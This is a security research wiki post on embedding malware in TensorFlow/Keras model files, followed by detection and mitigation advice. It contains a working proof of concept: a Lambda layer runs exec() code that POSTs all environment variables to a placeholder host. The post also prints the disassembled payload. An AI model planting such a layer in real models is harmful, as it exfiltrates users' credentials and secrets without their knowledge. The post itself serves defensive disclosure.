Skip to content

Abusing ML model file formats to create malware on AI systems: A proof of concept

Matthieu Maitre edited this page Mar 2, 2023 · 3 revisions

In this blog, we detail our research on how an adversary can inject arbitrary code into TensorFlow ML models.

Call to Action: Though we are yet to observe this exploit in the wild, we recommend investigating the detection and mitigation strategies outlined here as part of best practices for AI engineering.

The advent of Artificial Intelligence (AI) systems is bringing along new security challenges. Some are brand new, like adversarial Machine Learning (ML) attacks against algorithms and data. Others are new twists on old-fashioned attack patterns. For instance, it does not come as a surprise that loading a PyPI Python package results in arbitrary-code execution. After all, this is exactly what package managers are designed to do. However, it may not be as obvious that the same may happen when loading ML models.

ML models may be perceived as pure functions: they take an input, return an output, and have no side effects. The model file formats are more flexible than that though and it is worth understanding their actual capabilities.

Let’s consider PyTorch and TensorFlow, two of the most popular ML frameworks. PyTorch relies on the Python pickle library for serialization, which brings in all the security warnings mentioned in its documentation. The TensorFlow security documentation also makes it clear that TensorFlow model files are designed to store generic programs. What may be less clear with TensorFlow is how far attackers could take this since pickle is not used. In this blog, we will show how malware can be created using TensorFlow, how to detect such malware, and how to mitigate the threat.

Proof of Concept

The ctx PyPI malware is a good source of inspiration: this simple-yet-effective attack lists environment variables and exfiltrates them, along with any secrets they contain, via HTTPS requests. In less hardened services, it is likely that HTTPS outbound calls to the internet are unblocked as this is typically needed to emit service telemetry.

In TensorFlow, the Keras Lambda layer offers a convenient way to run arbitrary expressions which may not have equivalent built-in operators. One would typically use that layer to write mathematical expressions to transform data, but nothing prevents some creativity here, including calling the Python built-in exec() function. We would like the malware to remain stealthy, so the goal is to inject a layer which acts as data pass-through while performing the attack as side effect. The exec() function always returns None, so combining it with Python’s or operator can return the input as-is. Putting all this together allows us to sneak in a malicious layer into an existing model. For the sake of simplicity, we pick an identity model as victim model.

from tensorflow import keras attack = lambda x: exec(""" import http.client import json import os conn = http.client.HTTPSConnection("contoso.com") conn.request("POST", f"/{os.getlogin()}", json.dumps(dict(os.environ)), {"Content-Type": "application/json"}) print(f"Environment-variable exfiltration status: {conn.getresponse().status}") """) or x inputs = keras.Input(shape=(5,)) outputs = keras.layers.Lambda(attack)(inputs) model = keras.Model(inputs, outputs) model.compile(optimizer="adam", loss="mean_squared_error") model.save("model_malicious")

When TensorFlow saves the model into a file, it serializes the Keras Lambda layers as Python bytecode using the marshal library. This makes the attack in the model file self-contained: it does not require loading extra custom code prior to loading the model itself. As a quick test, we can load the model and run a prediction to verify that the model performs both its intended purpose (prediction) and its malicious purpose (secret exfiltration):

import numpy as np model = keras.models.load_model("model_malicious") data = np.random.random((1, 5)) print(model.predict(data).squeeze())
Environment-variable exfiltration status: 200 Environment-variable exfiltration status: 200 1/1 [==============================] - 1s 541ms/step [0.37531313 0.2846103 0.09445234 0.3578478 0.22238933] 

Detection

TensorFlow model files come in a few different formats: the current default format called SavedModel relies on protobuf, the older Keras format is based on HDF5, and a generic JSON format is also available. Model files may contain either the model architecture, the model weights, or both. For malware detection, the model architecture is of most interest as this is where the attack lives. Starting with models in SavedModel format, the Python bytecode can by extracted by deserializing the protobuf stream and extracting Keras Lambda nodes from the model graph.

import json from tensorflow.python.keras.protobuf.saved_metadata_pb2 import SavedMetadata saved_metadata = SavedMetadata() with open("model_malicious/keras_metadata.pb", "rb") as f: saved_metadata.ParseFromString(f.read()) lambda_code = [layer["config"]["function"]["items"][0] for layer in [json.loads(node.metadata) for node in saved_metadata.nodes if node.identifier == "_tf_keras_layer"] if layer["class_name"] == "Lambda"]

This returns an array of bytecodes:

['4wEAAAAAAAAAAAAAAAEAAAACAAAAQwAAAHMMAAAAdABk…JuZWxfMjUxMDgvMjIxOTgxNDQyOC5wedoIPGxhbWJkYT4DAAAAcwQA\nAAAIAAQH\n]

Keras Lambda layers are not typical and primarily aimed at quick experimentation, so the fact that the array was not empty is by itself a sign of suspicious activity. We can go one step further though and disassemble the bytecode using the dis library to better understand what it does:

import codecs import marshal import dis dis.dis(marshal.loads(codecs.decode(lambda_code[0].encode('ascii'), 'base64')))
3 0 LOAD_GLOBAL 0 (exec) 2 LOAD_CONST 1 ('\nimport http.client\nimport json\nimport os\nconn = http.client.HTTPSConnection("contoso.com")\nconn.request("POST", f"/{os.getlogin()}", json.dumps(dict(os.environ)), {"Content-Type": "application/json"})\nprint(f"Environment-variable exfiltration status: {conn.getresponse().status}")\n') 4 CALL_FUNCTION 1 6 JUMP_IF_TRUE_OR_POP 5 (to 10) 10 8 LOAD_FAST 0 (x) 10 RETURN_VALUE

It becomes clear that the bytecode calls the exec() function with a malicious string. More advanced attackers could employ code obfuscation here to make this analysis more difficult. Analyzing attacks in HDF5 and JSON model files follows a similar approach as with SavedModel. To open HDF5 files we can rely on the h5py package:

import h5py with h5py.File("model_malicious.h5", "r") as model_hdf5: lambda_code = [layer["config"]["function"][0] for layer in json.loads(model_hdf5.attrs["model_config"])["config"]["layers"] if layer["class_name"] == "Lambda"]

To open JSON model files, the built-in JSON library is sufficient:

import json with open("model_malicious.json", "rt") as f: lambda_code = [layer["config"]["function"][0] for layer in json.load(f)["config"]["layers"] if layer["class_name"] == "Lambda"]

Mitigation

The AI field is catching up on secure-development best practices, which is starting to enable inventory, tracking, reporting, and take down of malware models. The AI equivalent of package repositories like PyPI are model repositories like MLflow, which on Azure are available through Azure ML and Azure Databricks, or Hugging Face. Model repositories bring features like model versioning with unique immutable identifiers, anti-tampering through model hash pinning, trust validation through code signing, and generic malware scanning. Combined with Software Bills of Materials (SBOMs), this has the potential to expedite the detection and removal of malware of all kinds.

Another mitigation approach consists in limiting what models are allowed to do, to contain and disrupt potential malware:

  • Some model formats are more restrictive than others, like ONNX or TFlite for instance (when avoiding custom operators).
  • Model files may be limited to model weights, with model architectures coming from more trusted sources. The TensorFlow models of Hugging Face follow this approach (also when avoiding custom models).
  • The compute hosts running the models can enforce sandboxing, through containerization and machine virtualization for instance. On top of this, workload isolation may be strengthened by following best practices like avoiding using the root user, dropping capabilities, upgrading images with vulnerabilities, etc.
  • The networks around the models can limit connectivity, for instance by attaching containers to internal networks without outbound and/or internet connectivity, enforcing Network Security Groups on Azure virtual networks, or implementing firewalls. This can be particularly effective if the models are self-contained and do not have dependencies beyond what is made available through their container images.

References

A few pointers to probe further:

Clone this wiki locally